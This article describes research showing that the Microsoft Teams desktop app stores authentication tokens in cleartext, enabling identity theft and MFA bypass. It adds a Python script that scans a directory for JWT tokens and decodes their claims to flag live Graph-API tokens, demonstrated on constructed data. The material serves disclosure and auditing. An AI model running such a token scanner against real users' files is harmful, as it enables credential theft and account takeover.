

Our research discovered that the Microsoft Teams App stores authentication tokens in cleartext. The problem stems from the fact that Teams is an Electron-based app, and there is no support for encryption. With these tokens, attackers can assume the token holder's identity for any actions possible through the Microsoft Teams client, including using that token for accessing Microsoft Graph API functions from an attacker's system. Even worse, these stolen tokens allow attackers to conduct actions against MFA-enabled accounts, creating an MFA bypass. Microsoft is aware of this issue and closed the case stating that it did not meet their bar for immediate servicing. Until Microsoft moves to update the Teams Desktop Application, we believe customers should consider using the web-based Teams application exclusively.

Described as an "attack path that enables malicious actors with file system access to steal credentials for any Microsoft Teams user who is signed in", the attack can be performed without the need for elevated privileges. The issue was discovered last month by researchers from Vectra's Protect team.
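The practical consequence of cleartext storage is that anyone who can read the signed-in user's files can locate bearer tokens with nothing more than a pattern search, and the token's own claims tell them which API it is good for and for how long. The following script is an added example written for this page (it is not Vectra's tooling and not code from the Teams client): it walks a directory with ordinary user privileges, finds JWT-shaped strings in arbitrary binary files, and decodes their claims to flag Graph-audience tokens and expired ones. The directory layout, file names, account names and the token itself are all constructed here for the demo; the real on-disk paths used by Teams are not described on this page.

```python
# Added example (not from the article or from Vectra): scan a directory for
# cleartext JWT-shaped access tokens and summarize each token's claims.
# Everything the demo writes (file names, users, the token) is constructed;
# the real Teams storage layout is not described on this page.
from __future__ import annotations

import base64
import json
import re
import tempfile
import time
from pathlib import Path

# Three base64url segments; the two JSON parts start with "eyJ" because
# '{"' encodes to "eyJ". The signature segment is opaque.
JWT_RE = re.compile(rb"eyJ[A-Za-z0-9_-]{10,}\.eyJ[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}")


def b64url_decode(seg: bytes) -> bytes:
    """Decode unpadded base64url, the form JWT segments are stored in."""
    return base64.urlsafe_b64decode(seg + b"=" * (-len(seg) % 4))


def b64url_encode(raw: bytes) -> bytes:
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def decode_claims(token: bytes) -> dict | None:
    """Return the payload claims of a JWT, or None if it does not parse.
    The signature is deliberately not verified: a bearer token on disk is
    usable as-is, so the thief never has to verify it either."""
    try:
        return json.loads(b64url_decode(token.split(b".")[1]))
    except (ValueError, UnicodeDecodeError):
        return None


def find_tokens(data: bytes, now: float) -> list[dict]:
    """Find every cleartext JWT in a byte blob and summarize its claims."""
    findings = []
    for match in JWT_RE.finditer(data):
        claims = decode_claims(match.group(0))
        if claims is None:
            continue
        exp = claims.get("exp")
        findings.append({
            "aud": claims.get("aud"),
            "user": claims.get("upn") or claims.get("preferred_username"),
            "scp": claims.get("scp"),
            "expired": exp is not None and exp < now,
        })
    return findings


def scan_dir(root, now: float | None = None) -> dict[str, list[dict]]:
    """Walk a directory tree (e.g. an Electron app's profile folder) and
    report cleartext tokens per file. Needs only read access as the user."""
    now = time.time() if now is None else now
    results = {}
    for path in Path(root).rglob("*"):
        if path.is_file():
            hits = find_tokens(path.read_bytes(), now)
            if hits:
                results[path.name] = hits
    return results


def make_demo_token(claims: dict) -> bytes:
    """Constructed, unsigned stand-in for an access token (NOT a real
    Microsoft token): RS256 header, the given claims, and a fixed dummy
    signature so it has the same three-segment shape on disk."""
    header = b64url_encode(b'{"alg":"RS256","typ":"JWT"}')
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    signature = b64url_encode(b"\x00demo-signature-not-verifiable\x00")
    return header + b"." + payload + b"." + signature


def demo(now: float = 1_700_000_000) -> dict[str, list[dict]]:
    """Build a throwaway profile directory holding two constructed files
    (a binary blob with a live Graph token, a second file with an expired
    one), scan it, and return {file name: findings}."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "storage").mkdir()
        live = make_demo_token({
            "aud": "https://graph.microsoft.com",
            "upn": "alice@example.com",  # constructed identity
            "scp": "User.Read Chat.ReadWrite",
            "exp": now + 3600,
        })
        stale = make_demo_token({
            "aud": "https://graph.microsoft.com",
            "upn": "bob@example.com",  # constructed identity
            "scp": "User.Read",
            "exp": now - 3600,
        })
        # Binary padding around the token mimics a key/value store page.
        (root / "storage" / "000001.ldb").write_bytes(
            b"\x00\x01\x02token:" + live + b"\xff\xfe\x00")
        (root / "cookies.db").write_bytes(b"SQLite format 3\x00" + stale + b"\x00")
        return scan_dir(root, now)


if __name__ == "__main__":
    for name, hits in demo().items():
        for hit in hits:
            state = "EXPIRED" if hit["expired"] else "LIVE"
            print(f"{name}: {state} token for {hit['user']} aud={hit['aud']} scp={hit['scp']}")
```

Pointed at a real profile directory, `scan_dir` reports any token a same-user process could lift; a live entry whose `aud` is the Graph endpoint is exactly the credential the paragraph above describes, and because it is a bearer token, the MFA that issued it is not consulted again when it is replayed from another machine.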

